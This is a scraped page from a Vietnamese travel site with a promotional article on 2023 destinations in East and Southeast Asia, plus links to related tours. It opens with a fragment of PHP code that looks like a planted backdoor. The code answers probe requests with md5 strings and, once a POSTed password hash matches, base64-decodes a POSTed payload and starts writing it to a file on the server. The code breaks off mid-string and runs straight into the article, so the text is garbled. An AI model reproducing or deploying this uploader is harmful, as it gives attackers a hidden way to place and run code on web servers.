function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Du lịch nước ngoài 2023 đến quốc gia Châu Á cực hot

Du lịch nước ngoài 2023 đến quốc gia Châu Á cực hot

28/02/2023 Đi Để Đến - Group

Du lịch nước ngoài 2023 tại Châu Á luôn khiến du khách đau đầu lựa chọn vì có quá nhiều địa điểm hấp dẫn đang chờ đón. Mỗi một quốc gia khác nhau có những địa điểm du lịch thú vị và mang những nét đặc trưng riêng về văn hóa và truyền thống. Vậy du lịch nước ngoài 2023 có những địa điểm nào đang là xu thế? Xin mời các bạn cùng với dideden.com khám phá các địa điểm du lịch nước ngoài 2023 nổi bật nhé.

DU LỊCH NƯỚC NGOÀI 2023 ĐẾN CÁC QUỐC GIA ĐÔNG Á

1. Nhật Bản

Nhật Bản là một quốc đảo xinh đẹp với biệt danh đất nước mặt trời mọc luôn khiến du khách phải chao đảo vì sự đẹp đẽ của cảnh quan cũng như các dịch vụ vui chơi giải trí hàng đầu. Đến Nhật Bản trong tour du lịch nước ngoài 2023, bạn sẽ cảm nhận được những nét đẹp độc đáo trở thành biểu tượng của Nhật qua những địa điểm du lịch nổi tiếng như: Tháp Tokyo, các đền chùa tại Nhật, lâu đài Himeji, các cụm di tích cổ kính,…

Du lịch nước ngoài 2023 - Lâu đài Himeji

Lâu đài Himeji khi mùa xuân về.

Du lịch nước ngoài 2023 tại Nhật thì bạn có thể đến thăm các đền, chùa của xứ sở hoa anh đào. Các ngôi đền, chùa ở đây đều mang lối kiến trúc đặc biệt và được chế tạo bằng gỗ hoặc đá. Ngoài sự tinh tế, tỉ mỉ trong từng nét điêu khắc và lắp ráp đặc trưng của người Nhật, các đền chùa còn vừa mang trong mình sự đồ sộ, nguy nga vừa là nơi chốn thanh tịnh, yên tĩnh giữ chân nhiều du khách.

Du lịch nước ngoài 2023 - Đền Nikko

Các ngôi đền đá cổ kính thuộc cụm đền Nikko.

Đến thăm các ngôi chùa nổi tiếng tại Nhật khi đi du lịch nước ngoài 2023, bạn có thể đến thăm các ngôi đền, chùa xinh đẹp và nổi bật với dấu ấn tâm linh tại Nhật như: Chùa Kinkaku – Ji, chùa Kozanji, quần thể kiến trúc Phật giáo Horyuji, cụm đền chùa Nikko,…

Mang trong mình sự cổ kính, và quang cảnh xinh đẹp, thanh tịnh khó nơi nào có được, các đền chùa tại Nhật luôn là điểm đến hàng đầu cho những du khách và người dân địa phương tìm đến đề cầu chúc những điều bình an, may mắn.

Du lịch nước ngoài 2023 - Đền chùa tại Nhật

Nét đẹp nên thơ của những ngôi chùa tại Nhật.

Không chỉ những ngôi đền, chùa là điểm đến hấp dẫn tại Nhật khi du lịch nước ngoài 2023, các khu di tích tại đây cũng là địa điểm du lịch nước ngoài 2023 mà du khách chờ đón. Những di tích có cái là cố đô của Nhật Bản thời xưa. Có những nơi đơn giản chỉ là một ngôi làng đã được xây dựng từ lâu đời với lối sống văn hóa đặc biệt. Nhưng có nơi khác lại là minh chứng cho một lịch sử Nhật Bản đã từng bị tàn phá ác liệt bởi chiến tranh.

Du lịch nước ngoài 2023 - Di tích thành cổ Nara tại Nhật

Thành cổ Nara với kiến trúc đáng ngạc nhiên.

Nhưng có một điểm chung của các địa điểm, mỗi nơi đều là minh chứng cho những gì nước Nhật đã trải qua, là niềm tự hào dân tộc giúp Nhật Bản được phát triển hiện đại và văn minh như ngày nay. Một số di tích mà nhất định bạn phải đến thăm khi du lịch nước ngoài 2023 tại Nhật là: Cụm di tích thành cổ Nara, khu tưởng niệm hòa bình Hiroshima – Genbaku Dome, cụm di tích cố đô Kyoto,…

Du lịch nước ngoài 2023 - Cố đô Kyoto

Cố đô Kyoto trong chiều thu với ánh hoàng hôn lãng mạn.

Ngoài ra, khi đến thăm xứ sở hoa anh đào trong chuyến du lịch nước ngoài 2023, bạn cũng có thể trải nghiệm những hoạt động vui chơi giải trí cực kỳ thú vị tại khu vực thủ đô Tokyo hay đến Osaka thưởng thức những đặc sản và thú vui vùng Kansai. Hoặc đơn giản hơn, bạn có thể đến núi Phú Sĩ, tận hưởng những trò chơi thú vị trên tuyết vào mùa đông hoặc đến ngắm nhìn muôn ngàn hoa nở rộ vào mỗi độ xuân về.

>>>Xem thêm: ĐI DU LỊCH NHẬT BẢN CẦN NHỮNG GÌ – A ĐẾN Z

2. Hàn Quốc

Hàn Quốc là quốc gia với nền công nghiệp giải trí hàng đầu châu á với những idol tầm cỡ quốc tế. Không chỉ vậy, Hàn Quốc còn ẩn chứa những địa điểm tham quan du lịch tuyệt đẹp mà bất cứ du khách nào cũng phải mê mẩn khi đi du lịch nước ngoài 2023.

Nếu bạn là fan của những bộ phim tình cảm Hàn Quốc lãng mạn thì chắc hẳn bạn sẽ biết đến tháp Namsan nhỉ? Đây là một địa điểm du lịch đẹp và lãng mạn bậc nhất mà bất cứ cặp đôi nào cũng muốn đến thăm một lần và cùng nhau khóa ổ khóa tình yêu tại đây để đảm bảo mối nhân duyên trường tồn vĩnh cửu.

Du lịch nước ngoài 2023 - Hàn Quốc

Hàn Quốc thơ mộng xứng đáng là điểm đến du lịch hàng đầu.

Nếu như bạn là con người của ăn uống, vui chơi về đêm thì ngay tại thủ đô Seoul có phố Itaewon với những dịch vụ vui chơi giải trí cho cuộc sống về đêm ấn tượng bậc nhất mà bạn nhất định phải thử một lần khi đi du lịch nước ngoài 2023.

Ngoài ra, Hàn Quốc còn có những địa điểm tham quan nổi tiếng thường được lấy bối cảnh để quay những bộ phim cổ trang hàng đầu. Những địa điểm nổi tiếng có thể được nhắc đến là: Cung điện quốc gia Gyeongbokgung, làng Hanok Bukchon, vườn trúc Juknokwon,… Những địa điểm đó mang đậm những dấu ấn lịch sử của triều đại phong kiến tại Hàn Quốc.

Du lịch nước ngoài 2023 - Cung điện lịch sử Hàn Quốc

Cung điện Gyongbokgung cổ kính sẽ đưa bạn quay ngược thời gian.

Khi đi du lịch nước ngoài 2023 tại đây, bạn sẽ được hòa mình vào thiên nhiên tươi đẹp, cùng nhau tìm hiểu nghệ thuật và lịch sử qua những hiện vật còn tồn tại đến tận ngày nay. Bật mí cho bạn rằng tại cung điện Gyeongbokgung có cho thuê trang phục truyền thống hanbok để cho du khách hóa thân thành những quý phi, hoàng tử dạo chơi trong khuôn viên cung điện cổ kính này.

Một điểm đến khác rất hấp dẫn với du khách du lịch nước ngoài 2023 đó chính là khu phố Gangnam. Gangnam tập trung nhiều trung tâm vui chơi giải trí, các trung tâm thương mại lớn hàng đầu Hàn Quốc với vô vàn những sản phẩm quyến rũ bạn từ cái nhìn đầu tiên.

Du lịch nước ngoài 2023 - Gangnam sầm uất

Khu phố Gangnam sang trọng và sầm uất bậc nhất Hàn Quốc.

Đến với Gangnam, khu phố này còn là nơi tọa lạc nhiều khách sạn cũng như bất động sản cao cấp sang trọng và đẳng cấp hàng đầu sẽ khiến bạn có những trải nghiệm du lịch nghỉ dưỡng khó quên nhất khi du lịch nước ngoài 2023.

Đến Hàn Quốc trong khi du lịch nước ngoài 2023 vào mùa hè bạn cũng không thể bỏ qua du lịch biển đâu nhé. Biển đảo tại Hàn Quốc là một thiên đường nghỉ dưỡng tuyệt vời đối với những du khách trong nước và quốc tế trong mùa hè sôi động và nóng nực.

Du lịch nước ngoài 2023 - Đảo Jeju

Thiên đường đảo Jeju tại Hàn Quốc.

Tại Hàn Quốc, nổi tiếng nhất về du lịch biển có đảo Jeju là thiên đường nghỉ dưỡng với thảm thực vật xanh mướt cùng với không khí mát mẻ tuyệt vời. Tại đây, bạn có thể tắm nắng trên bãi cát trắng mịn trải dài hay ngồi trong một quán cà phê xinh đẹp với tầm nhìn hướng ra biển xanh thư giãn.

Địa điểm du lịch biển tiếp theo mà bạn phải kể đến trong chuyến du lịch nước ngoài 2023 tại Hàn Quốc chính là bãi biển tại Busan. Busan là thành phố cảng lớn nhất Hàn Quốc với bãi biển trải dài đẹp tuyệt. Ở Busan, ngoài việc tắm biển để xua tan cái nắng nóng thì bạn có thể đến thăm thủy cung Busan để tham quan hàng nghìn sinh vật thủy sinh và các loài cá xinh đẹp lạ mắt.

Du lịch nước ngoài 2023 - Chợ cá Busan

Chợ cá Busan vào buổi sáng sớm tươi đẹp.

Ngoài ra, bạn cũng có thể dạo một vòng quanh chợ cá Busan để mua hoặc thưởng thức các món ăn hải sản đặc biệt tại đây. Vùng Busan nổi tiếng với những loại hải sản tươi ngon và phương thức chế biến đặc biệt. Nếu đã du lịch nước ngoài 2023 tại Hàn Quốc, bạn nhất định phải thử hải sản tại đây một lần nhé.

>>>Xem thêm: Kinh nghiệm DU LỊCH HÀN QUỐC NĂM 2023 mùa thu A-Z

3. Trung Quốc

Trung Quốc là quốc gia anh em với Việt Nam với đường biên giới tiếp xúc với một số tỉnh phía Bắc nước ta. Trung Quốc hiện nay là một đất nước rất phát triển với nền công nghiệp phát triển tiên tiến không nơi đâu sánh kịp. Đến với du lịch nước ngoài 2023 tại Trung Quốc, bạn sẽ được chiêm ngưỡng những đô thị xa hoa, sầm uất của đất nước tỷ dân.

Du lịch nước ngoài 2023 - Thượng Hải

Những tòa nhà chọc trời làm nên biểu tượng của đất nước tỷ dân.

Những thành phố lớn như Thiên Tân, Thâm Quyến, Bắc Kinh, Thượng Hải, Quảng Châu,… với những tòa nhà chọc trời mọc lên như nấm với những kiến trúc đặc biệt sẽ khiến bạn phải ngỡ ngàng. Có những tòa nhà chọc trời đã trở thành biểu tượng của thành phố mà chỉ cần nhìn qua là bạn sẽ nhận ra ngay lập tức.

Du lịch nước ngoài 2023 - Thiên Tân

Vòng quay khổng lồ là biểu tượng của thành phố Thiên Tân – Trung Quốc.

Đến với Trung Quốc, bạn sẽ được trải nghiệm những thiên đường mua sắm lớn có một không hai. Những trung tâm thương mại mua bán sầm uất hay những con phố mua sắm sẽ khiến bạn đam mê lạc lối bởi những món quần áo, trang sức, giày dép, túi xách,… với chất lượng tuyệt vời.

Ngoài ra, tại Trung Quốc còn có những địa điểm du lịch nổi tiếng là di sản thế giới mà bạn nhất định phải thử khi đi du lịch nước ngoài 2023 như: Tử Cấm Thành, Lăng mộ Tần Thủy Hoàng, Vạn Lý Trường Thành, Phượng Hoàng Cổ Trấn, Phố Cổ Lệ Giang,… Đây là những địa điểm du lịch với quang cảnh và kiến trúc rất đỗi hùng vĩ được xây dựng lên từ hàng trăm năm trước.

Du lịch nước ngoài 2023 - Phượng Hoàng Cổ Trấn

Phượng Hoàng Cổ Trấn đẹp đến nao lòng trong mùa đông lạnh giá.

Chính bằng những sự kỳ công, sự hùng vỹ và nét đẹp độc lạ được truyền thừa từ các thế hệ trước đã làm nên tên tuổi của những địa danh này, khiến cho mọi du khách đến đây tham quan thì đều muốn được quay lại đây chơi thêm lần nữa. Ngoài ra, khi đến đất nước tỷ dân trong chuyến du lịch nước ngoài 2023, bạn cũng có thể chọn những địa điểm có cảnh quan rừng núi, sông suối nguyên sơ để trải nghiệm cảnh đẹp tự nhiên nguyên sơ nhất.

Du lịch nước ngoài 2023 - Vạn Lý Trường Thành

Vạn Lý Trường Thành trong ánh nắng bình minh.

Những khu du lịch vùng núi rừng sẽ khiến bạn có một chuyến nghỉ dưỡng hòa mình vào thiên nhiên thư thái chưa từng có. Trung Quốc là một quốc gia rộng lớn có nhiều thắng cảnh và nơi vui chơi sầm uất giúp bạn có được những trải nghiệm tuyệt vời có một không hai trong chuyến du lịch nước ngoài 2023 của mình.

>>>Xem thêm: Du lịch Phượng Hoàng Cổ Trấn – top 5+ điều du khách nên làm

DU LỊCH NƯỚC NGOÀI 2023 VI VU TẠI VÙNG ĐÔNG NAM Á SÔI ĐỘNG

1. Thái Lan

Thái Lan hiện nay là một trong những nước đứng đầu Đông Nam Á về du lich. Đến với Thái Lan khi đi du lịch nước ngoài 2023, bạn sẽ bị choáng ngợp bởi những địa điểm du lịch nổi tiếng siêu đẹp thu hút ánh nhìn và sự yêu thích của du khách trong nước và quốc tế.

Tự nhiên ban cho Thái Lan những quang cảnh rừng núi, sông, suối, biển,… siêu đẹp và mát mẻ sẽ khiến bạn như lạc vào chốn thần tiên. Ngoài ra, tại Thái Lan, bạn cũng có thể đến thăm các địa điểm du lịch nổi tiếng được xây dựng và phát triển từ thời xưa cổ và tồn tại cho đến ngày nay.

Du lịch nước ngoài 2023 - Biển đảo với phong cảnh siêu đẹp

Biển đảo Thái Lan với làn nước xanh tươi đẹp là địa điểm du lịch đáng nhớ trong lòng du khách.

Khi đến thăm Thái Lan trong chuyến đi du lịch nước ngoài 2023, bạn có thể vui chơi, thăm thú cực nhiều địa điểm du lịch nổi tiếng và thưởng thức những món ăn ngon trải dài từ Bangkok đến Chiang Mai. Nền ẩm thực Thái luôn có một sự quyến rũ nhất định với những tín đồ nghiện ăn uống, đặc biệt là những món chủ đạo với hương vị chua cay ngon xoắn lưỡi.

Du lịch nước ngoài 2023 - Pad Thái

Pad Thái – Món ăn đặc sản xứ sở chùa Vàng.

Thái Lan còn được mệnh danh là xứ sở chùa vàng và chùa chiền tâm linh cũng là điều nổi tiếng bậc nhất tại đây. Bạn có thể đến thăm những ngôi đền chùa linh thiêng với lối kiến trúc đặc trưng tạo nên tên tuổi của xứ chùa vàng như: Đền Wat Pho, chùa Wat Arun, chùa Wat Traimit, chùa Wat Phra Kaew,… Du lịch nước ngoài 2023 tại Thái Lan, bạn có thể hòa mình vào thiên nhiên và khám phá những sự đặc sắc của tạo hóa.

Du lịch nước ngoài 2023 - Wat Arun

Wat Arun vào ngày lễ hội thả đèn hoa đăng tạo nên phong cảnh tuyệt đẹp.

Đến du lịch tại Thái Lan, bạn có thể tham quan những vườn quốc gia, những hang động, những vùng biển với làn nước trong xanh và quang cảnh tuyệt vời chưa từng có như: Vườn quốc gia Khao Sok, vườn quốc gia Khao Yai, Phuket, quần đảo Similan, đảo Koh Phi Phi, Koh Phang Nga,…

Du lịch nước ngoài 2023 - Phuket

Phuket với làn nước biển trong vắt làm say lòng du khách.

Nhờ sự bảo tồn và sự quan tâm chăm sóc của cả người dân lẫn chính phủ mà tại các vùng biển, đảo, rừng núi tại Thái Lan gần như vẫn giữ được những nét hoang sơ vốn có của thiên nhiên. Khi du khách đi du lịch nước ngoài tại đây sẽ được tận hưởng trọn vẹn thiên nhiên trong lành, thanh tịnh mà khó nơi nào có được.

Thêm vào đó, những địa điểm du lịch mang đậm hơi thở truyền thống, văn hóa với lối kiến trúc nguy nga tráng lệ của người dân Thái Lan như: Bảo tàng quốc gia Bangkok, cung điện hoàng gia Thái Lan, làng thủ công mỹ nghệ Bo Sang,…

Du lịch nước ngoài 2023 - Thái Lan

Cung điện Hoàng gia Thái Lan với vẻ ngoài tuyệt sắc mang đến cho du khách những trải nghiệm tuyệt vời.

Còn nếu như bạn là một người thích khám phá những hoạt động hàng ngày của người dân Thái cũng như muốn trải nghiệm đỉnh cao ẩm thực và mua sắm những món quà độc lạ tinh xảo cho người thân khi đi du lịch nước ngoài thì đến các khu chợ là một ý kiến hay. Một số ngôi chợ sầm uất và cực kì nổi tiếng trong giới du lịch nổi lên là biểu tượng đất Thái có thể kể đến như: Chợ Chatuchak, chợ đêm Chiang Mai, chợ nổi Pattaya,…

Du lịch nước ngoài 2023 - Mua sắm tại chợ Chatuchak

Du khách mua sắm tại chợ Chatuchak.

Tại đây, bạn có thể thưởng thức vô vàn món ngon hấp dẫn chuẩn Thái với hương vị chua cay đậm đà cuốn hút. Hoặc đơn giản hơn, bạn có thể tham quan mua sắm những vật dụng, đồ thủ công, đồ lưu niệm độc đáo và đẹp mắt mang về làm quà cho người thân cũng như bạn bè. Thái Lan là một địa điểm đáng ghé thăm một lần nếu như bạn có dự định du lịch nước ngoài 2023.

>>>Xem thêm: Tour Thái Lan 2023 giá rẻ – Trọn bộ kinh nghiệm mới nhất

2. Singapore

Singapore là một quốc  gia có diện tích bé nhỏ nằm tại ngoài khơi Thái Bình Dương và là một địa điểm du lịch nước ngoài 2023 nổi bật mà bạn không nên bỏ lỡ. Nổi tiếng với sự văn minh và cảnh quan xinh đẹp nao lòng, Singapore luôn là địa điểm được lòng cả du khách trong nước và quốc tế. Tại đây, bạn có thể trải nghiệm được những dịch vụ vui chơi, giải trí, mua sắm và nghỉ dưỡng đỉnh cao.

Du lịch nước ngoài 2023 - Biểu tượng Singapore

Biểu tượng thú đầu sư Merlion tại Singapore.

Đầu tiên, phải kể đến những địa điểm giúp bạn có thể chiêm ngưỡng cảnh sắc đất nước Singapore tươi đẹp và có thể phóng tầm nhìn ra tận ngoài khơi xa. Nổi bật trong số những địa điểm chiêm ngưỡng quang cảnh hùng vĩ nhất có thể kể đến: Marina Bay Sands Skypark Singapore, đu quay Singapore Flyer, Sky Helix Sentosa Singapore,…

Du lịch nước ngoài 2023 - Marina Bay Sands Skypark Singapore

Quang cảnh tuyệt vời của Marina Bay Sands Skypark Singapore vào chiều tối.

Bên cạnh đó, đảo quốc sư tử còn có những địa điểm nổi bật về cảnh quan rừng nhiệt đới độc đáo, vườn thú và thủy cung với những góc check in siêu xịn mà bạn không nên bỏ lỡ như: Garden By The Bay Singapore, The Original Ducks Tour Singapore, thủy cung Sea Aquarium, khu bảo tồn thiên nhiên đất ngập nước, đảo cá heo, Night Safari Singapore,…

Du lịch nước ngoài 2023 - Thủy CUng tại Singapore

Sea Aquarium Singapore nổi bật trong mắt du khách với vô vàn loài cá từ đại dương.

Khi du lịch nước ngoài 2023 đến với những địa điểm du lịch trên, bạn có thể hòa mình việc trải nghiệm hành trình khám phá tự nhiên và đa dạng sinh học tại Singapore huyền bí sẽ giúp bạn được mở mang thêm nhiều kiến thức về các loại sinh vật, cây cối.

Nếu như bạn là một người yêu thích công nghệ và khoa học, Singapore cũng có những địa điểm vui chơi dành cho du lịch nước ngoài 2023 đáng giá bậc nhất. Bạn có thể ghé thăm các địa điểm như: Universal Studios Singapore, Singapore Science Center, iFly Singapore,…

Du lịch nước ngoài 2023 - Night Safari Zoo

Trải nghiệm chiêm ngưỡng các loài động vật tại Night Safari Singapore.

Ngoài những địa điểm nổi bật kể trên, đảo quốc sư tử còn có vô vàn điểm đến hấp dẫn mà du khách nên thử đến một lần khi đi du lịch nước ngoài 2023. Bạn có thể đến tham quan bảo tàng Lịch sử tự nhiên Lee Kong Chian để xem hơn một triệu mẫu vật từ các sự sống trên Trái Đất từ thuở sơ khai đến nay.

Hay nếu như bạn là một người hay dành sự chú ý đến những nhân vật nổi tiếng toàn cầu thì tại Madame Tussauds Singapore sẽ là nơi mà bạn có thể được “gặp gỡ” thần tượng của mình với phiên bản tượng sáp giống đến 99%.

>>>Xem thêm: Tour đi Singapore: Du lịch trọn gói giá rẻ bất ngờ

3. Indonesia

Indonesia là một điểm đến hấp dẫn du khách du lịch nước ngoài 2023 với hàng trăm nghìn hòn đảo lớn nhỏ và cảnh vật đẹp nghiêng nước nghiêng thành. Nơi đây sở hữu cảnh sắc non nước hữu tình, non xanh nước biếc và thiên nhiên cây cối hoang sơ mang một nét đẹp huyền bí quyến rũ du khách.

Du lịch nước ngoài 2023 - Cổng trời Bali

Cổng trời Bali xinh đẹp thu hút ánh nhìn.

Tại Indonesia, người dân chủ yếu theo đạo Hồi Giáo nên những công trình tại đây được xây dựng với những nét đẹp độc đáo và huyền bí được truyền thừa từ thời xa xưa đến ngày nay. Indonesia là một địa điểm nổi tiếng trên toàn thế giới với loài rồng Komodo được tìm thấy tại đây. Với sự kết hợp văn hóa, truyền thống giữa hai vùng đất Á – Âu, Indonesia được dự kiến sẽ là một địa điểm du lịch đáng nhớ nhất mà không du khách du lịch nước ngoài 2023 có thể chối từ.

Du lịch nước ngoài 2023 - Du lịch Indonesia

Du lịch tại Indonesia là một trải nghiệm thú vị.

Chắc hẳn bạn đang tò mò biển đảo Indonesia có gì nổi bật nếu đến đây du lịch nước ngoài 2023? Bali chắc chắn là địa điểm nổi danh bậc nhất mà chắc hẳn ai cũng đã từng nghe qua một lần. Bali nổi tiếng với bãi biển xanh ngắt, cát trắng mịn được những con sóng vỗ về ôm ấp.

Phía trên cao những bãi biển ấy lại là những vách núi cao dựng đứng có thể khiến bạn phải ngước nhìn. Ngoài ra, tại Bali, bạn cũng có thể đến tham quan cổng trời siêu đẹp hoặc đi dạo chợ đêm khám phá ẩm thực và đồ thủ công mỹ nghệ.

Du lịch nước ngoài 2023 - Bờ biển đảo thiên thần

Đảo thiên đường xinh đẹp gây thương nhớ đối với nhiều du khách.

Bên cạnh đó, đến cầu phúc tại suối thiêng Tampak Siring hoặc các đền chùa cũng là một hoạt động thú vị khi đi du lịch nước ngoài 2023. Đến Indonesia, bạn cũng có thể đi thăm thú và khám phá những ngôi đền mang đậm dấu ấn kiến trúc cổ đại và toát ra hơi thở lịch sử mạnh mẽ như: Thành phố cổ Yogyakarta, đền Borobudur, cao nguyên Dieng, đền Tanah Lot,….

Du lịch nước ngoài 2023 - Di tích cổ đại

Thành phố cổ tại Indonesia là một trong những địa điểm du khách nhất định phải ghé thăm.

Đặc biệt, khi đi du lịch nước ngoài 2023 tại Indonesia, bạn không thể bỏ lỡ vườn quốc gia Komodo. Đến với vườn quốc gia Komodo, bạn sẽ được chiêm ngưỡng khung cảnh đẹp tuyệt vời của núi rừng, quang cảnh rộng rãi của đồng cỏ rộng bao la và đặc biệt hơn là chiêm ngưỡng những chú rồng Komodo đặc trưng.

Du lịch nước ngoài 2023 - Vườn quốc gia Komodo

Vườn quốc gia Komodo nơi loài rồng Komodo sinh sống.

Ngoài những địa điểm kể trên, Indonesia còn có những địa điểm du lịch khác chiều lòng du khách du lịch nước ngoài 2023 như: Quần đảo Gili, đảo Bunaken, hồ xanh Kawah Ijen,… với khung cảnh thiên nhiên nguyên sơ hùng vĩ và xinh đẹp tuyệt vời.

>>>Xem thêm: Dịch vụ làm visa đi Indonesia cho người nước ngoài

Du lịch nước ngoài 2023 luôn khiến du khách phân vân bởi có quá nhiều địa điểm đáng giá. Hãy nhanh tay nhấc máy và gọi đến tổng đài 1900 3398 để được giới thiệu và tư vấn về các địa điểm du lịch nước ngoài 2023 nổi bật nhất nhé.

ĐĂNG KÍ DU LỊCH NƯỚC NGOÀI 2023

  • Tour Bình Châu 1 ngày tắm suối khoáng nóng siêu độc đáo
    Tour Bình Châu 1 ngày tắm suối khoáng nóng có đang được bạn quan tâm trong chuyến du lịch Vũng Tàu sắp tới? Chắc chắn nhiều người sẽ thắc mắc rằng đi Bình Châu thì nên tham gia những hoạt động gì, ăn gì, ở đâu? Bài viết sau đây của Đi Để Đến sẽ […]
  • Tour du lịch Vũng Tàu siêu hấp dẫn trong dịp cuối năm 2023
    Tour du lịch Vũng Tàu là lựa chọn phổ biến với những ai đang cần nạp “vitamin sea”. Vũng Tàu nổi tiếng là vùng biển yên bình, thú vị và tràn đầy sức sống. Vũng Tàu cách TP.HCM khoảng 110 km và tốn thời gian di chuyển khoảng 2 giờ. Nếu bạn đang có kế […]
  • Tất tần tật kinh nghiệm đi Tà Xùa chi tiết nhất 2023
    Tà Xùa được biết đến là thiên đường săn mây đẹp nhất ở vùng núi Tây Bắc. Theo kinh nghiệm đi Tà Xùa thì nơi đây là một trong những điểm đến được giới trẻ yêu thích nhất. Tà Xùa quanh năm được bao phủ bởi mây trắng bồng bềnh trên các đỉnh núi. Bạn […]
  • Đi Phú Quốc mùa nào đẹp? Top 10 địa điểm siêu hấp dẫn
    Đi Phú Quốc mùa nào đẹp chắc hẳn là câu hỏi mà rất nhiều người đang băn khoăn! “Đảo ngọc” Phú Quốc đang là một “thiên đường nghỉ dưỡng” được rất nhiều khách du lịch trong nước và nước ngoài săn đón. Nơi đây không chỉ thu hút du khách bởi những dãy núi non […]
  • Tour Singapore 5 ngày 4 đêm – Khám phá vẻ đẹp đảo quốc sư tử
    Singapore được biết đến là một đất nước hiện đại, năng động và phát triển. Nơi đây còn nổi tiếng với nhiều danh lam thắng cảnh và ẩm thực độc đáo. Lựa chọn tour Singapore 5 ngày 4 đêm sẽ mang đến cho bạn chuyến hành trình thú vị. Cùng Đi Để Đến khám phá […]
  • Du lịch Thái Lan đi đâu? Khám phá xứ sở chùa Vàng dịp hè 2023
    Bạn có biết du lịch Thái Lan đi đâu là thú vị nhất chưa? Những năm gần đây Thái Lan đang trở thành điểm du lịch hấp dẫn. Nơi đây còn nổi tiếng với nhiều điểm vui chơi thú vị, thu hút đông đảo du khách. Những bạn lần đầu đến Thái Lan sẽ không […]